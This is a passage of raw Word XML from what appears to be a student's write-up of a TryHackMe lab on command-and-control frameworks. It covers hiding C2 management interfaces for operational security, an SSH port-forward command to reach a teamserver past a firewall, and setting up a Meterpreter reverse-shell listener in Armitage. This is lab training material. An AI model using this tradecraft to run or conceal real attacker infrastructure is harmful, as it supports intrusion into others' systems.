      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="008E7C34" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="00ED2676" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>No Answer needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED2676" w:rsidRPr="00ED2676" w:rsidRDefault="00ED2676" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D22D2A" w:rsidRDefault="00BC20C6" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC20C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 4 Setting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC20C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC20C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> a C2 Framework </w:t>
      </w:r>
      <w:r w:rsidR="008E7C34">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020B43" w:rsidRPr="00020B43" w:rsidRDefault="00020B43" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020B43">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: In case you're using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00020B43">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00020B43">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, you may skip to the Pre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>paring our Environment section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="008E7C34" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED2676" w:rsidRPr="00ED2676" w:rsidRDefault="00ED2676" w:rsidP="008E7C34">
      <w:r>
        <w:t>No Answer needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="008E7C34" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D22D2A" w:rsidRDefault="005A3EB8" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A3EB8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5 C2 Operation Basics </w:t>
      </w:r>
      <w:r w:rsidR="008E7C34">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00FF6CE5" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6CE5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Accessing and Managing your C2 Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have a general idea of how to set up a C2 Server, we will go over some basic operational details that you should know when accessing your C2 Server. It's important to note that you are not required to perform any actions in this task - This is meant to gain general experience and familiarity with </w:t>
      </w:r>
      <w:r w:rsidR="00B05BFF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Command and Control Frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="0064388B" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064388B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Basic Operational Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We briefly touched on this in the last section; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> should never have your C2 management interface directly accessible. This is primarily for you to improve operational security. It can be incredibly easy to fingerprint C2 servers. For example, in versions prior to 3.13, Cobalt Strike C2 servers were able to be identified by an extra space (\x20) at the end of the HTTP Response. Using this tactic, many Blue Teamers could fingerprint all of the Cobalt Strike C2 servers publicly accessible. For more information on fingerprinting and identifying Cobalt Strike C2 Servers, check out this posted on the Recorded Future blog.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00B05BFF" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05BFF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1099194"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="10" name="Picture 10" descr="C:\Users\shefali\Pictures\THM\5.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efali\Pictures\THM\5.1c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99194"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Screenshot from a Hex Editor depicting the extra space at the end of an HTTP Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The point in mentioning this is that you want to reduce your operational security risk as much as possible. If this means not having the management interface for your C2 server publicly accessible, then, by all means, you should do it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00843146" w:rsidRDefault="00843146" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00B4549B" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4549B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Accessing your Remote C2 Server that's Listening Locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This section will be focusing on how to securely access your C2 server by SSH port-forwarding; if you have port-forwarded with SSH before, feel free to skip over this section, you may not learn anything </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. For those unfamiliar, SSH port-forwarding allows us to either host resources on a remote machine by forwarding a local port to the remote server, or allows us to access local resources on the remote machine we are connecting to.  In some circumstances, this may be for circumventing Firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972C09" w:rsidRPr="00F24819" w:rsidRDefault="00972C09" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00972C09">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1231516"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="11" name="Picture 11" descr="C:\Users\shefali\Pictures\THM\5.2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fali\Pictures\THM\5.2c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31516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Firewall Bl</w:t>
      </w:r>
      <w:r w:rsidR="00AA7D38">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ocks TCP/8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Or, in our instance, this could be done for operational security reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00AA7D38" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7D38">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1274981"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="12" name="Picture 12" descr="C:\Users\shefali\Pictures\THM\5.3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efali\Pictures\THM\5.3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74981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Firewall Allows TCP/22, allowing us</w:t>
      </w:r>
      <w:r w:rsidR="00904B41">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access TCP/8080 over TCP/22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Now that we have a better understanding of why we want to SSH port forward, let's go over the how.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">In our C2 set up from Task 4, our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Teamserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is listening on localhost on TCP/55553. In order to access Remote port 55553, we must set up a Local port-forward to forward our local port to the remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Teamserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> server. We can do this with the -L flag on our SSH client:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="003169C8" w:rsidRDefault="003169C8" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>SSH Port Forward</w:t>
      </w:r>
      <w:r w:rsidR="00F24819" w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 55553:127.0.0.1:55553 root@192.168.0.44</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">$ echo "Connected" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="005B2E1F" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Connected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Now that we have an SSH remote port forward set up, you can now connect to your C2 server running on TCP/55553. As a reminder, Armitage does not support listening on a loopback interface (127.0.0.1-127.255.255.255), so this is general C2 server admin advice. You will find this advice more centric to C2 servers like Covenant, Empire, and many others.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We highly recommend putting firewall rules in place for C2 servers that must listen on a public interface so only the intended users can access your C2 server. There are various ways to do this. If </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">you are hosting Cloud infrastructure, you can set up a Security Group or use a host-based firewall solution like UFW or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IPTables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="001A67CB" w:rsidRDefault="001A67CB" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A67CB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Creating a Listener in Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we're going to move onto a topic that all C2 servers have - this being listener creation. To stay on topic, we will demonstrate how to set up a basic listener with Armitage then explore some of the other theoretical listeners you may encounter in various other C2 Frameworks. Let's create a basic Meterpreter Listener running on TCP/31337. To start, click on the Armitage dropdown and go over to the "Listeners" section; you should see three options, Bind, Reverse, and set LHOST. Bind refers to Bind Shells; you must connect to these hosts. Reverse refers to standard Reverse Shells; this </w:t>
      </w:r>
      <w:r w:rsidR="001A67CB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>is the option we will be using.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2E1F" w:rsidRDefault="005B2E1F" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2E1F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5353050" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13" name="Picture 13" descr="C:\Users\shefali\Pictures\THM\5.4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efali\Pictures\THM\5.4c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2124075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="001A67CB" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A67CB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Creating a Listener in Armitage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">After clicking "Reverse," a new menu will open up, prompting you to configure some basic details about the listener, specifically what port you want to listen on and what listener type you would like to select. There are two options you can choose from, "Shell" or "Meterpreter". Shell refers to a standard </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-style reverse shell, and Meterpreter is the standard Meterpreter reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004620F7" w:rsidRDefault="004620F7" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004620F7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2419350" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14" name="Picture 14" descr="C:\Users\shefali\Pictures\THM\5.5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efali\Pictures\THM\5.5c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1514475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Configuring the Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">After pressing enter, a new pane will open up, confirming that your listener has been created. This should look like the standard </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/multi/handler module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16449" w:rsidRDefault="00F16449" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16449">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3524250" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture 15" descr="C:\Users\shefali\Pictures\THM\5.6c2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efali\Pictures\THM\5.6c2 .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1409700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24819" w:rsidRPr="00F24819" w:rsidRDefault="00F24819" w:rsidP="00F24819">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
